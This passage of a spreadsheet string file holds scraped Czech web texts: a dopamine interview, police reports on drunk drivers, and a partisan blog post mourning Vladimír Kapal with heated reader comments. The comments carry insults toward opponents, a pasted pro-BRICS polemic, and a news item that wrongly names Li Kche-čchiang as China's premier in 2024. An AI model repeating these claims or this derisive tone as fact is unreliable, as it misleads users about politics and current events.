    <t>5a814b9d63b8ccebd389</t>
  </si>
  <si>
    <t>„Dopamin je dnes nejdražší platidlo, které máme,“ říká Petr Havril z GrowJOB Institutu</t>
  </si>
  <si>
    <t>„Dopamin je dnes nejdražší platidlo, které máme,“ říká Petr Havril z GrowJOB Institutu 1. 11. 2024 | 7 minut radosti Foto: GrowJOB Institute Rozhovor Dopamin je často považován za hormon štěstí, ale ve skutečnosti hraje mnohem složitější roli v naší motivaci a spokojenosti. Jak s ním v dnešní uspěchané době pracovat efektivněji a vyhnout se závislosti na „levném“ dopaminu z digitálních lákadel? Nejen o tom hovoří lektor z GrowJOB Institutu Petr Havril. Dopamin je často zmiňován jako „hormon štěstí“. Jak přesně funguje? Dopamin má v našem těle několik funkcí. Nazývat ho hormonem štěstí je velmi zjednodušené – primárně má velký vliv na naši motivaci. Ovlivňuje naše chování, a proto je vhodnější ho nazývat hormonem motivace nebo odměny. Jeho funkcí je uvolňování v našem mozku při různých aktivitách a vyvolávání pocitu uspokojení. Na druhou stranu je důležité zmínit, že dopamin v našem mozku funguje tak, že nám přináší uspokojení z jakékoliv činnosti, přičemž náš mozek neumí rozlišit, zda je tato činnost pro nás dobrá nebo špatná. Proto můžeme dopamin rozdělit na škálu levného a drahého dopaminu, která nám ukazuje, jak přínosné jsou různé činnosti z hlediska naší spokojenosti. Z biologického hlediska můžeme dopamin nazvat neuromodulátorem, což znamená, že je nadstavbou pro fungování dalších transmiterů, jako je serotonin, histamin a další. Když to shrnu, produkce dopaminu v našem mozku závisí na tom, jaké aktivity děláme a co nám přináší potěšení. Tyto činnosti produkují a uvolňují dopamin v našem mozku, pomáhají nám je uložit do paměti a častěji je opakovat. Dopamin hraje významnou roli v tom, jak se učíme, jak komunikujeme, jak se pohybujeme a jaké máme emoce. Dovolím si říct, že je to dnes nejdražší „platidlo“, které máme. Jak nás dopamin ovlivňuje v každodenním životě? Jak jsem zmínil, je dobré k dopaminu přistupovat jako k nejdražšímu platidlu, které máme, a naučit se s ním zacházet. Všechno, co v našem životě děláme – od momentu, kdy otevřeme oči, přes všechny důležité pracovní aktivity, sociální interakce, až po spánek – ovlivňuje dopamin a tím i naši spokojenost. Zásadně ovlivňuje motivaci v našem životě. Například když máte před sebou důležitou schůzku, chystáte se na sport nebo máte vytyčený cíl, dopamin už při samotné myšlence na tyto aktivity způsobuje povzbuzení. Tento proces uvolňování začíná už při samotné myšlence. Například když se chystáte jít cvičit, už tato myšlenka vám přináší příjemný pocit, který způsobuje uvolňování dopaminu a pohání vás k dokončení aktivity. Následně vám dopamin přináší pocit uspokojení a chuť tuto aktivitu opakovat. Je nutné zmínit, že stejně jako se dopamin uvolňuje, dochází také k jeho propadům. Nízká hladina dopaminu způsobuje nedostatek motivace, apatii a nechuť cokoliv dělat. Dobrá zpráva je, že po každém propadu dochází k postupnému doplnění dopaminu na základní hladinu. Zásadní však je, jakými aktivitami to děláme. Obecně platí, že bychom si neměli „plácat“ dopamin na zbytečnostech, jako je neustálé sledování sociálních sítí, porno, kontrola telefonu či nezdravé jídlo. Tyto činnosti nepřispívají k zdravému doplnění naší základní hladiny a mohou způsobit závislost na špatných věcech, čímž se snižuje citlivost receptorů. To znamená, že co nás dříve uspokojilo, už nám nemusí přinášet stejný pocit uspokojení. Foto: GrowJOB Institute Je funkce dopaminu ovlivňována dobou, ve které žijeme? Jak? Dnešní doba má výrazný vliv na funkci dopaminu, a to z několika hledisek. Často vyčerpáváme dopamin na snadno dosažitelných věcech, které nevyžadují příliš velké úsilí. Dopamin byl evolučně navržen tak, aby nás motivoval k přežití. Naši předci ho využívali při lovu zvěře nebo boji, kdy museli vyvinout určité úsilí. V dnešní konzumní době se snažíme vytlačovat nepříjemné věci rychlým uspokojením, což často vede k větší závislosti. Dnes máme snadný přístup k informacím, sociálním sítím a dalším věcem, které způsobují okamžité uspokojení. Nadužíváme moderní technologie a jsme neustále k dispozici. Liky , komentáře a notifikace způsobují uvolňování dopaminu, ale zároveň chronicky otupují naši schopnost dosahovat uspokojení z běžných věcí, což snižuje naši motivaci. Co považujete za největší výzvy v souvislosti s dopaminem v dnešním digitálním světě? Jednou z největších výzev je ztráta naší pozornosti a soustředění. Neustálé kontrolování mobilních telefonů, sociálních sítí a vyhledávání informací snižuje naši koncentraci. Lidé se nedokážou soustředit na hlubokou práci, což je čím dál větší problém, zejména v kontextu efektivity a příchodu umělé inteligence. Pozitivní je, že naše hladina dopaminu se po propadech dokáže doplnit, a můžeme ji regulovat disciplínou a omezením používání mobilních telefonů. Můžeme sami hladinu dopaminu regulovat? Jak? Dobrou zprávou je, že můžeme hladinu dopaminu regulovat. Špatné návyky jako nadužívání telefonu, alkoholu , nezdravého jídla nebo porna můžeme vyměnit za aktivity, které produkují více „drahého“ dopaminu. Našim cílem by mělo být v našem životě mít více drahého dopaminu, který vyžaduje určité úsilí. Kvalitní spánek, zdravá strava a fyzická aktivita jsou základními faktory pro udržení vyvážené hladiny dopaminu. Práce s dopaminem zahrnuje také mindfulness a meditaci, které mají pozitivní vliv na naše dopaminové cesty. Je důležité najít rovnováhu mezi okamžitým uspokojením a dlouhodobým uspokojením. Petr Havril vystudoval psychologii managementu a ve své závěrečné práci se zabýval tématem koučování ve firemním prostředí. Petr se stal jako lektor součástí GrowJOB Institutu po dlouholeté manažerské kariéře v korporátním bankovním prostředí. Jeho hlavní misí byl vždy spokojený tým. K tomu jako manažer využíval techniky a nástroje, kterým se dnes věnuje jako lektor. Jeho hlavní témata jsou management pozornosti, dopamin a jeho vliv na naše chování, soustředění, pozornost a mindfulness. Těšit se můžete na jeho veřejný webinář s názvem DOPAMIN JAKO KLÍČ: Jak mít výrazně více energie, motivace a chuti do života?, který se koná v neděli 8. 12. 2024 od 19 hodin. Rozhovor 3. 5. 2022 | 12 minut radosti Autor: Lucie Pultrová Autor person Lucie Pultrová Rubrika transition_slide Rozhovor</t>
  </si>
  <si>
    <t>5830</t>
  </si>
  <si>
    <t>3200</t>
  </si>
  <si>
    <t>20241101_138_3244621299_7ec6703719907ddbc12e.html</t>
  </si>
  <si>
    <t>7ec6703719907ddbc12e</t>
  </si>
  <si>
    <t>Opilí řidiči, opilí cyklisté. Břeclavští strážníci shrnuli dění posledních dnů</t>
  </si>
  <si>
    <t>Opilí řidiči, opilí cyklisté. Břeclavští strážníci shrnuli dění posledních dnů Tři dopadení řidiči nadýchali okolo jedné promile. Čtvrtému přístroj změřil promile tři. "A ještě tomu nasadil korunu, když neváhal do vozu posadit i dítě," zdůraznila za Městskou policii Břeclav Lenka Rigó. Brněnsko Jeden ze dvou podnapilých cyklistů na sebe upozornil dopravní nehodou, od které ujel. Druhý si na kole počínal tak, že ohrožoval silniční provoz. "Dechovou zkoušku ale odmítl. Proto se na něj bude pohlížet jako kdyby alkohol požil," vysvětlila Rigó. Krimi V síti strážníků uvízl v posledních dnech také řidič, který byl sice střízlivý, ale měl za přestupky v minulosti zakázáno řídit. Všechny případy nyní řeší Policie České republiky . Autor: Vladan Dokoupil Autor person Vladan Dokoupil Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>10910</t>
  </si>
  <si>
    <t>2900</t>
  </si>
  <si>
    <t>20241101_139_3244591328_0cb1c96c3933affabed1.html</t>
  </si>
  <si>
    <t>0cb1c96c3933affabed1</t>
  </si>
  <si>
    <t>Opilý řidič boural u svitavské nemocnice. Pak pokračoval s prázdným kolem</t>
  </si>
  <si>
    <t>Opilý řidič boural u svitavské nemocnice. Pak pokračoval s prázdným kolem “To se mu ovšem nepodařilo a ve své jízdě pokračoval dál. Nezastavil ho dokonce ani náraz do jednoho ze zaparkovaných vozidel u svitavské nemocnice. Po několika kilometrech už byl ale řidič na silnici I/34 ve směru zpět na Koclířov donucen zastavit z důvodu devastačního poškození kola,” popsala situaci policejní mluvčí Iveta Kopecká . V té samé chvíli už u něj byli policisté z oddělení hlídkové služby, které na lince 158 zalarmoval všímavý svědek. Policisté chtěli muže zkontrolovat, ten však místo pozdravu začal utíkat do pole, kde ho muži zákona rychle doběhli a zadrželi. Nehody U 67letého řidiče byla provedena dechová zkouška na alkohol , která byla pozitivní s výsledkem přes 1,8 promile. Policisté ve věci zahájili úkony trestního řízení pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. V případě odsouzení řidiči hrozí trest odnětí svobody až na 3 roky. Autor: Martin Alt Autor person Martin Alt Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>7440</t>
  </si>
  <si>
    <t>5100</t>
  </si>
  <si>
    <t>20241101_14_3264603026_61400c30228a4ea6bd3c.html</t>
  </si>
  <si>
    <t>61400c30228a4ea6bd3c</t>
  </si>
  <si>
    <t>O kolaboranta míň...</t>
  </si>
  <si>
    <t>O kolaboranta míň... Pá, 01. 11. 2024, 21:53 Autor svoboda slova Toto napsal jistý Martin Beer do diskuse na mém fejsbůkovém profilu. Dodal k tomu, že je to sice tvrdé, ale je to tak. O kom myslíte, že to napsal? Napsal to senátorovi Krausovi, který zemřel na embolii, protože to byl zarytý ODSák, který podporoval tuto vládu? Ne, napsal to o Vladimíru Kapalovi, zakladateli svobodného rádia, který zemřel tento čtvrtek nad ránem po dlouhé těžké nemoci. Vladimír Kapal byl jeden z průkopníků toho, co dneska mezi námi, dezoláty, už dělá každý. Jestliže velká mééédia lžou, nadržují jedné straně a vymlčují důležitá témata, je zapotřebí si udělat vlastní média. A tak si na důchod založil internetové Svobodné rádio, kam si zval ty, které by Česká televize nikdy nepozvala, na klidné a příjemné debaty. Nebojoval proti mediálním lžím, že by jim zapaloval auta. Neposílal reportérům výhružné dopisy. Prostě si založil rádio a mluvil tam o věcech, o kterých se jinde nemluvilo. A nakonec na to doplatil životem. Za jeho rozhovor s Josefem Skálou, kde rozebírali události v Katyni , se oba dostali před soud. To víte, byl srpen 2022 a válka na Ukrajině byla jasně vyhraná, naše vláda už si kolíkovala Luhanskou oblast, kterou bude po válce obnovovat a Rusko to zaplatí válečnými reparacemi. Tehdy se jiné názory nevyvracely, tehdy se prostě blokovaly i s weby, kde byly zveřejněny. I soudci podle toho soudili a tak se po dlouhém chození na soudní stání dozvěděl od Nejvyššího soudu, že „vybočil z rámce běžných projevů a jeho společenská škodlivost je o to vyšší, protože prohlubuje nedůvěru v demokracii a právní stát.“ V dnešní době se proti jiným názorům nepostupuje po hitlerovsku, ale po kafkovsku. Dneska na vás nepošlou gestapo, ale státní a justiční byrokracii. Nikdo vás nestřelí do týla za rozvracení jejich krásných pořádků, ale uštvou vás. Zákony už na to máme. Můžete být souzen i když jste nikomu nezpůsobili škodu. Smažou vám profil i bez soudního příkazu… Dneska se nevolá policie, ale volá se Zuckerbergovi, že o laptopu Huntera Bidena se na fejsbůku prostě psát nebude. Dneska vám nevezmou počítač, ale vezmou vám chuť k životu. Vladimíra Kapala nakonec po dvouletém trápení dohnala mrtvice. Nebyl k tomu zapotřebí ani jeden „tajnej,“ který by chodil všude za ním. Žádní divní páni mu nevyhrožovali. Jen mu řádně chodila předvolání a výhružky od spořádaných občanů… Psům, psí smrt! Nakonec se to podařilo. A může za to samozřejmě mrtvice… tak to stojí v protokolu. Není tam jméno žádného kata a vlastně ani soudce. Jak to napsal Karel Kryl ? Demokracie dozrála do žaludečních vředů… A dnes o něm jistý Martin Beer řekl, že alespoň je o kolaboranta míň. Pravděpodobně nikdy neslyšel žádný jeho pořad ani rozhovor a ve skutečnosti vůbec neví, kdo Vladimír Kapal byl. Jen se o něm na nějakém liberálním plátku dozvěděl to nejhorší. Někde napsali, že Kapal je kolaborant, bodrý Čech to vzal jako fakt a přišel si zatančit u jeho památníku. Nijak si to neověřoval, protože dneska se přece věří vládě, médiím i institucím. A kdo jim nevěří, je svině a je zapotřebí kolem něj vykopat příkop a postavit plot. Když zemřel senátor Kraus, vyjadřovali mu jeho odpůrci soustrast a mluvili o tom, jak je to zasáhlo. Když zemře Vladimír Kapal, je to důvod k exhibicím, protože v jeho případě se to může a nikdy nepřijde ani soudní příkaz, ani předvolání od policie ohledně přestupku, jak se to stalo Máje Šabinské. Radost nad tím, že je o kolaboranta míň, ta je svobodou projevu chráněná, ale běda, kdyby se takhle někdo vyjadřoval o Krausovi. To už by policie u něj klepala… chlubili se, že jsou schopni internetovou nenávist odhalovat do čtyřiadvaceti hodin. Smrt Vladimíra Kapala mě zasáhla o to víc, že sedím na stejném tygrovi a jsem ohrožen tím samým, co ho přivedlo do hrobu. Je to připomínka toho, že boj za svobodu má i v dnešní pokrokové liberální demokracii své oběti. A také je připomínka, že je mezi námi stále dost lidí, kteří se jen třesou na to, až se budou moci vybít z těch nejnižších pudů. Dnes jsem na jednu lahev portského napsal Vladimírovo jméno a uložil. Zůstane nedotčena tak dlouho, dokud v tomto boji nezvítězíme. Dokud nezničíme tuhle kafkovskou dystopii. Dokud nebude platit, že svoboda slova je především svoboda říkat věci, které lidi nechtějí slyšet. Vypiju ji s přáteli, až bude běžné, že vás za buřičské řeči posadí do studia České televize proti nějakému odborníkovi na dané téma a ten vás bude mlátit po hlavě argumenty, nikoliv soudními příkazy. Vladimíre, čest Tvé památce. Zvedl jsou korouhev tohoto boje jako jeden z prvních. Snad ji dokážeme nést dál alespoň tak dlouho, jako jsi ji nesl Ty. Hodnocení Log in to post comments Komentáře v nebi někoho, komu by chtěl poděkovat za to, že BYL a říct mu: Log in to post comments Napsal uživatel včelka Mája dne Pá, 01. 11. 2024, 22:10 A kdo je Beer. Nějaký malý bezvýznamný libtardí pivo ... Průměrný počet slepic: 4.7 (110 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 12:06 In reply to * by včelka Mája Log in to post comments Napsal uživatel Mirekxy dne Pá, 01. 11. 2024, 22:14 To nebude ani malý pivo . To budou nějaký rezavý chcanky. Průměrný počet slepic: 4.6 ( 101 hlas) Log in to post comments Napsal uživatel KIMJAN dne So, 02. 11. 2024, 11:20 In reply to Beer.... by Mirekxy Nejspíš z júesej Jednou jsme od námořníků dostali pivo z júesej, skutečný chcanky (na rozdíl od piva australského), ale do dobré nálady nás přivedlo stejně. Sice ne pivo samotné, nýbrž nápis na pixle: "Pozor! Užívání tohoto nápoje vede k opilosti!" Průměrný počet slepic: 4.7 (29 hlasů) Log in to post comments Napsal uživatel Inza dne Pá, 01. 11. 2024, 22:26 BRICS po Kazani : laboratoř budoucnosti Dlouho očekávané setkání hlav států BRICS v ruské Kazani nezklamalo. Tato mnohostranná instituce konečně přinesla konkrétní řešení mnoha globálních finančních a politických hádanek, které dlouho bránily vytvoření nového globálního řádu. Pepe Escobar 30.10.2024 - zkráceno Ruské předsednictví BRICS 2024 si nemohlo pro pořádání summitu zatíženého obrovským očekáváním globální většiny vybrat multikulturnější a různorodější místo. Jihozápadní ruské město Kazaň na březích řek Volhy a Kazanky je hlavním městem poloautonomní republiky Tatarstán , která je proslulá živou směsicí tatarské a ruské kultury. Přestože se summit BRICS konal na výstavišti Kazaň Expo - jakési víceúrovňové stanici propojené s letištěm a s expresním spojením do města - byl to právě Kazaňský kreml, staletá opevněná citadela a památka světového dědictví, který se stal symbolem BRICS 2024. Právě citadela podtrhla kontinuitu od 10. století přes bulharskou kulturu, Zlatou hordu a chanát 15.-16. století až po moderní Tatarstán . Kazaňský kreml je poslední tatarskou pevností v Rusku se zbytky původní architektury. Světová muslimská umma nezapomněla poznamenat, že se jedná o severozápadní hranici šíření islámu v Rusku . Minarety mešity Kul Šaríf v Kremlu tak vlastně získaly ikonický rozměr - symbolizují kolektivní, transkulturní, civilizačně-státní úsilí o vybudování rovnějšího a spravedlivějšího světa. Bylo mimořádným zážitkem sledovat po celý rok, jak se ruské diplomacii daří dojednávat účast na summitu v Kazani . Zúčastnily se delegace ze 36 zemí - z toho 22 bylo zastoupeno hlavami států, účast přijalo i šest mezinárodních organizací včetně OSN . Tyto delegace pocházely ze zemí, které představují téměř polovinu světového HDP. Z toho vyplývá, že tsunami tisíců sankcí uvalených od roku 2022 na Rusko a neutuchající křik o "izolaci" Ruska prostě zmizely ve víru zapomnění. To přispělo k nesmírnému podráždění, které kolektivní Západ nad tímto pozoruhodným setkáním projevil. Klíčový podtext: v Kazani nebyla přítomna jediná oficiální účast sestavy Five Eyes - USA , V.Británie, Kanada , Austrálie a Nový Zéland . Cesta vpřed, z Asie do muslimského světa První kolo rozšiřování BRICS v loňském roce se soustředilo především na západní Asii a severovýchodní Afriku ( Írán , Spojené arabské emiráty, Egypt a Etiopie , přičemž Saudská Arábie o svém konečném statusu teprve rozhoduje). Nyní vznikla nová kategorie partnerů, která má 13 členů: Alžírsko , Bělorusko , Bolívie , Kuba , Indonésie , Kazachstán , Malajsie , Nigérie , Thajsko , Turecko , Uganda , Uzbekistán a Vietnam . Muslimské země jsou v rámci snah BRICS všude; současně se Asie jako celek rychle stává hlavním územím BRICS. Hluboká debata o tom, jak vytvořit nový globální finanční a platební systém prakticky od nuly - klíčový pilíř dewesternizace - probíhá od února neúnavně napříč BRICS. Začátkem října ruské ministerstvo financí oznámilo spuštění projektu BRICS Bridge - digitální platební platformu pro přeshraniční obchod v národních měnách. Klíčovou otázkou - vážnou starostí pro globální většinu - je způsob vypořádání obchodních přebytků a deficitů. Pokud jde o iniciativy, jako je BRICS Bridge a BRICS Pay - zkušební provoz karty BRICS Pay proběhl týden před Kazaní -, není to technický problém. Nezáleží ani tak na tom, jak měnu poslat, ale co s ní udělat na druhém konci. Je to záležitost výsostně politická, ale existují způsoby, jak ji obejít, protože převládající, Západem kontrolovaný systém SWIFT je velmi primitivní. Vše výše uvedené ztělesňuje ducha toho, že BRICS začne v roce 2024 fungovat - pod vedením ruského předsednictví - jako globální laboratoř, v níž se budou testovat všechny možné modely, staré i nové, které se budou uplatňovat ve více uzlech . Z diplomatického hlediska Kazaňská deklarace uvádí, že nové přístupy by měly být předloženy OSN a skupině G20; reálně však nic nenasvědčuje tomu, že by je kolektivní západní blok přijal s otevřenou náručí. Drobné detaily de-dolarizace Kromě ustavení 13 nových partnerů - tvořících rozsáhlou transkontinentální zónu BRICS - Kazaň prosazovala dvě klíčové platformy: BRICS Clear a BRICS Insurance Company. BRICS Clear je mnohostranný systém zúčtování/vypořádání jak pro obchod BRICS, tak pro obchod mezi BRICS a jejich partnery (v současné podobě se vztahuje na 22 zemí). Hlavním cílem je opět obejít systém SWIFT. BRICS Clear bude pro mezinárodní obchod používat národní měny. Vše bude probíhat prostřednictvím stablecoinu - zúčtovací jednotky - spravované bankou BRICS se sídlem v Šanghaji . Obchod vyžaduje pojišťovací služby (jak pro samotný kontrakt, tak pro přepravu); tyto pojišťovací služby zahrnují zajišťovací činnosti. Prostřednictvím pojišťovny BRICS si BRICS buduje nezávislost na západních pojišťovnách". BRICS Clear a BRICS Insurance budou mít v krátkodobém až střednědobém horizontu obrovské důsledky pro světový obchod a používání amerických dolarů a eur. Obchodní toky, a to jak v rámci BRICS , tak mezi partnery BRICS, které již nyní představují nejméně 40 % celosvětového objemu, mohou exponenciálně vzrůst. Souběžně s tím přijdou západem kontrolované pojišťovny a zajišťovny o mnoho svých klientů. To je de-dolarizace v praxi - pravděpodobně svatý grál BRICS. Do roku 2030 může efekt BRICS Clear vést k tomu, že podíl dolaru na rezervách světových centrálních bank klesne "z 58 % na přibližně 35-40 %". Menší dolarové rezervy centrálních bank povedou k tlaku na trh amerických státních dluhopisů a mohou způsobit značné potíže pro americké ministerstvo financí při refinancování dluhu Spojených států ". Hegemon to nebude brát přinejmenším na lehkou váhu. Laboratorní experimenty proti aroganci Tyto geoekonomické průlomy BRICS - říkejme tomu laboratorní experimenty - odrážejí diplomatické převraty, jako když Indie a Čína za zprostředkování Ruska oznámily v předvečer Kazaně svou snahu urovnat bilaterální problémy v Himálaji , aby podpořily sjednocující, pan-kooperativní agendu BRICS. Cílem pan-kooperativní agendy je dosažení shody a jednotného přístupu k problémům, které přesahují hranice jednotlivých států Řešení geopolitických otázek mezi členskými zeměmi je klíčovou prioritou BRICS. Příklad Číny a Indie by se měl přenést na Írán a Saudskou Arábii , pokud jde o jejich angažmá v Jemenu , a na Egypt a Etiopii , pokud jde o kontroverzní stavbu velké přehrady na Nilu . Zasvěcení úředníci BRICS otevřeně přiznávají, že BRICS potřebuje vnitřní institucionální mechanismus pro řešení závažných problémů mezi členskými státy - a případně partnery. A tím se dostáváme k největší žhavé tragédii: izraelským vojenským ofenzivám v Gaze , Palestině , Libanonu , Jemenu , Sýrii a Íránu . Neoficiální zdroje z BRICS prozradily, že na uzavřených zasedáních i na dvoustranných schůzkách se aktivně diskutovalo o dvou scénářích. První předpokládá íránsko-izraelskou horkou válku, přičemž Libanon se promění v hlavní bojiště, což povede k "řetězové reakci" zahrnující několik arabských aktérů. Druhý scénář předpokládá celozápadní asijskou krizi, do níž by se zapojily nejen sousední země, ale i to, co by se spojilo do koalic - jedna proarabská, druhá proizraelská. Je otázkou, kam by zapadli pochybní aktéři jako Egypt a Jordánsko . Není jasné, jak by BRICS jako multilaterální organizace reagoval na oba scénáře. Nepochopení kolektivního Západu pro to, co se odehrálo během tří historických dnů v Kazani , jen zdůraznilo jeho ohromující aroganci, hloupost a brutalitu. Právě to je důvod, proč země BRICS tak usilovně pracují na tom, aby realizovaly nový, spravedlivější mezinárodní řád, který navzdory řadě současných problémů bude i nadále vzkvétat. Průměrný počet slepic: 4.8 (122 hlasů) Log in to post comments Napsal uživatel Libor52 dne Pá, 01. 11. 2024, 22:37 Vidláku, byl jsi výborný. Český Krumlov. .... vysíláno dnes stál za to, jen nevím kam dříve. Mám podezření, že pan Kapal je vlastně první oběť díky politice (Vonka, Toufar ale to byly jiné okolnosti) a vlastně kvůli úplně nevinnému a zástupnému tématu jako byla Katyně (dva roky starý rozhovor). To ale bylo namířeno hlavně proti Skálovi jako prezidentskému kandidátu. Tak že se dá předpokládat že pohřeb pana Kapala bude další národní probuzení. Sice smutné, ale může to vstoupit do historie. Pokud to bude jen trochu možné, tak v pátek osmého tam budu. Pohřeb Petránka jsem prošvihl, ale tady budu. PS: Vidlák se v Krumlově zmínil že jeho Kydy sleduje denně 300 tisíc lidí, což je více než OVM. Doporučuji shlédnout proto že tam nastiňuje i taktiku "ovládání společnosti" s minimálními náklady a velikým dosahem, viz zde na webu. Gratuluji. Průměrný počet slepic: 4.8 (122 hlasů) Log in to post comments Napsal uživatel včelka Mája dne Pá, 01. 11. 2024, 22:42 Neskutečně se bavím nad tím, - jak se pětikoaliční tábor může zvencnout z toho, že Robert Fico udělal rozhovor pro ruskou televizi. Za prvé pan premiér jako profesionální politik moc dobře ví, že komunikace je lepší než ostentativní mlčení a vyhrožování si nepřátelskými kroky, a za druhé je z jeho pohledu určitě racionálnější bavit se s ruskými médii než s liberálně propagandistickými plátky placenými zahraničními zájmovými skupinami typu Forum24 nebo Deník N. Ostatně, když se mě kdysi Deník N ptal na to, jestli mi nevadí dělat rozhovory s dezinformačními médii, tak jsem jim odpověděl následovně: "Důkazem toho, že mluvím s každým, tedy i s médii prokazatelně šířícími lži a propagandu, je fakt, že se právě teď bavím s vámi." Na to už paní redaktorka neměla jak odpovědět. 🙂 (FB J. Rajchla) Log in to post comments Napsal uživatel Inza dne Pá, 01. 11. 2024, 23:17 Čínský premiér jednal se slovenským premiérem Aktualizováno: 1. listopadu 2024 21:57 Xinhua PEKING , 1. listopadu - Čínský premiér Li Kche-čchiang jednal v pátek v Pekingu s premiérem Slovenska Robertem Ficem. Li uvedl, že Slovensko je jednou z prvních zemí, které navázaly diplomatické vztahy s Čínou , a konstatoval, že za posledních 75 let se čínsko-slovenské vztahy rozvíjely zdravě a stabilně. Obě strany se těší vzájemnému respektu, rovnosti a přátelské spolupráci, což oběma národům přináší hmatatelné výhody, dodal. Čína je ochotna udržovat se slovenskou stranou vzájemnou politickou důvěru na vysoké úrovni, poznamenal Li s tím, že obě strany by měly rozšířit spolupráci vedenou vysoce kvalitním rozvojem Pásma a stezky. Li uvedl, že obě země by měly plně využít úlohu společného hospodářského výboru a výboru pro vědeckotechnickou spolupráci a podporovat spolupráci v oblastech, jako je čínsko-evropský železniční expres, konektivita a výstavba infrastruktury. Obě strany by měly dále rozšířit objem dvoustranného obchodu a prozkoumat potenciál spolupráce v nově vznikajících odvětvích, jako je digitální ekonomika a zelená ekonomika, aby společně podpořily nové ekonomické hnací síly pro obě země, uvedl Li. Čína a Slovensko by měly společně usilovat o zajištění lepšího podnikatelského prostředí pro podniky ve svých zemích, uvedl premiér. Poznamenal, že obě strany by měly pokračovat ve zlepšování výměn v oblasti kulturní turistiky, vědy, vzdělávání, sportu, médií, mládeže a dalších oblastech mezilidských výměn a podporovat zakládání kulturních center v zemích druhé strany s cílem posílit vzájemné porozumění a přátelství mezi oběma národy. Za svou stranu Fico zmínil, že rozvojové úspěchy Číny v posledních letech jsou příkladem pro země celého světa. Uvedl, že Slovensko podporuje globální iniciativy navrhované Čínou . Slovensko pevně dodržuje politiku jedné Číny a uznává, že vláda Čínské lidové republiky je jedinou legální vládou zastupující celou Čínu , řekl Fico . Premiér uvedl, že Slovensko nesouhlasí s dodatečnými cly uvalenými EU na čínské elektromobily, a dodal, že EU a Čína by měly hledat vhodné řešení prostřednictvím dialogu a konzultací. Uvedl, že Slovensko je ochotno posílit výměnu a koordinaci s Čínou v mezinárodních záležitostech s cílem společně řešit globální výzvy. Po jednání byli Li a Fico svědky podpisu několika dokumentů o dvoustranné spolupráci v oblasti dopravy, hospodářství a obchodu, kultury, cestovního ruchu a ekologického a nízkouhlíkového rozvoje. Průměrný počet slepic: 4.9 (144 hlasů) Log in to post comments Napsal uživatel Alice20 dne So, 02. 11. 2024, 09:49 Bez ohledu na Pépéčka... Bez ohledu na Pépéčka, z nichž jedním je zřejmě i ten "dobrák" Beer, trošku jen odbočím od Vidlákova článku... všimla jsem si, že ačkoliv se jedná o foto z nedemokratické, zlé, komunistické, lidskoprávadusící Číny , kde je vše špatně, jak nám předkládají soudruzi z ÚV ČT a spol., tak Čína je asi jednou z mála zemí, která do čestné jednotky postaví i holky. Přitom považte... nikdo jim tam nenutí všelijaké ty Mééééééétoooooo, gendery a podobné nesmysly. Oni to tam tak zařídili sami od sebe a ta čestná jednotka má hned tak trochu jiný říz. Jo a s "Nutiči" něčeho by zřejmě byli asi taky hned hotovi. ( Nutiči totiž nemají odvahu tam jít, a mistrovat Číňany u nich doma, aby tohle a tohle, na to je takový Nutič zbabělý). Zřejmě postavení muže, ženy a rodiny u nich bude mít trochu jiný význam, než jsou "moderní" měřítka, která se snaží nastavit řada politiků a jejich fanatických přisluhovačů z řad neziskovek a podobných ve vyspělém Západním světě.. Vysvětlivky: Pépéčko - PP - Pokřivený Prašivec, neštítící se přát jiným smrt, radující se z neštěstí druhých a adorující různá jiná svinstva. ÚV ČT - Ústřední vykladač Česká televize - jediné médium, chrlící "zaručenou a uvědomělou" pravdu. Nutič - Trotl, snažící se rozbít vše, co je tradiční, vyzkoušené a funkční po staletí. Průměrný počet slepic: 4.7 ( 61 hlas) Log in to post comments Napsal uživatel Zauber dne So, 02. 11. 2024, 16:33 sice vypadají dobře, ale normální asi nejsou. Mě zbraně a buzerace nikdy nepřitahovaly. Průměrný počet slepic: 4.3 (8 hlasů) Log in to post comments Napsal uživatel Libor52 dne So, 02. 11. 2024, 16:49 In reply to Ty vojandy by Zauber Sice vypadají dobře ale vojandy? Mně jako šoféra Tir jednou chytly "celnice" jindy policistky a jejich názor byl "je to také zaměstnání". Ale dorazil mně nápis na zádi dodávky. Obrázek selky a nad ním nápis "jezdím proto že musím". Tak že s možností že holky mohou vše, proč ne. Už prý jim někde navrhly těhotenské uniformy a prý také budou zřizovat školky při zaměstnání. Průměrný počet slepic: 4.9 (8 hlasů) Log in to post comments Napsal uživatel Bob dne So, 02. 11. 2024, 17:55 In reply to Ty vojandy by Zauber Log in to post comments Napsal uživatel Itkica dne Pá, 01. 11. 2024, 23:04 Pan Kapal "Kauzu" jsem sledovala po celou dobu, protože se týkala pana doktora Skály, kterého si vážím jako člověka i jako historika a výborného rétora (naposledy teď na Václavském náměstí 28.10.). A tak jsem registrovala soudní proces, který se jich týkal, tedy i pana Kapala. Věděla jsem, že ho v důsledku odsouzení postihla mrtvice. A že jeho přítelkyně se po dobu jeho nemoci obracela na soudy, instituce. A teď i na prezidenta jak bylo uvedeno před pár dny na Parlamentkách. Bohužel jak psala nikdo jí nikdy neodpověděl, nereagoval! Velmi smutné i vypovídající. A komentáře těch "nelidských" děsivé. Upřímnou soustrast! Průměrný počet slepic: 4.9 (128 hlasů) Log in to post comments Napsal uživatel Jaroslav136 dne Pá, 01. 11. 2024, 23:24 In reply to Pan Kapal by Itkica Nelidských? Řekl bych, že je je to spíš hýkavý smích hyen nad kořistí. A jásavý taneček kleine beer nad smrtí člověka patří do stejného ranku. Rétor byl skvělý, obrovská slovní zásoba a když mluvil, znělo to jako verše. Novinář ze starého těsta. Průměrný počet slepic: 4.8 (85 hlasů) Log in to post comments Napsal uživatel Itkica dne So, 02. 11. 2024, 00:11 In reply to Nelidských? by Jaroslav136 Jaroslav136 "Nelidští tvorové", bylo mnou myšleno, jsou všichni ti, kteří komentují tímto způsobem úmrtí člověka, o kterém třeba vůbec neslyšeli, nic nevěděli, ale z jejich pohledu si to náhle zaslouží jen kvůli jinému názoru, schvalují i teroristické činy, chtějí druhé "vykrvit", nenajdou kousek soucitu ani slušnosti aspoň mlčet! Prskají tu žluč a agresi kolem sebe. Diskuze jsou jich bohužel plné... A netýká se to jen "politiky". A jak stále píše Vidlák, dvojí kilometr. Neboť co je dovoleno Jovovi není dovoleno volovi Průměrný počet slepic: 4.9 (75 hlasů) Log in to post comments Napsal uživatel Mec dne Pá, 01. 11. 2024, 23:50 Moc smutné Pana Kapala jsem poslouchával na Svobodném rádiu. Pokaždé po 19 